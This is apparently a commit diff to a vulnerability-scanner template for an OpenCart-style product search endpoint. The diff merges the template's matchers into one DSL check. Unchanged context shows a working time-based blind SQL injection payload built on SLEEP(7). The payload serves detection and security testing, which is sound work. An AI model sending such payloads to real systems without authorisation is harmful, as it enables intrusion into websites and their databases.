updated matcher
parent
59e27ab375
commit
1cc5a73784
|
@ -37,12 +37,10 @@ http:
|
|||
GET /index.php?route=product/search&search=')+AND+(SELECT+8368+FROM+(SELECT(SLEEP(7)))uUDJ)--+Nabb HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=7'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 'contains(body, "Nabb</title>")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue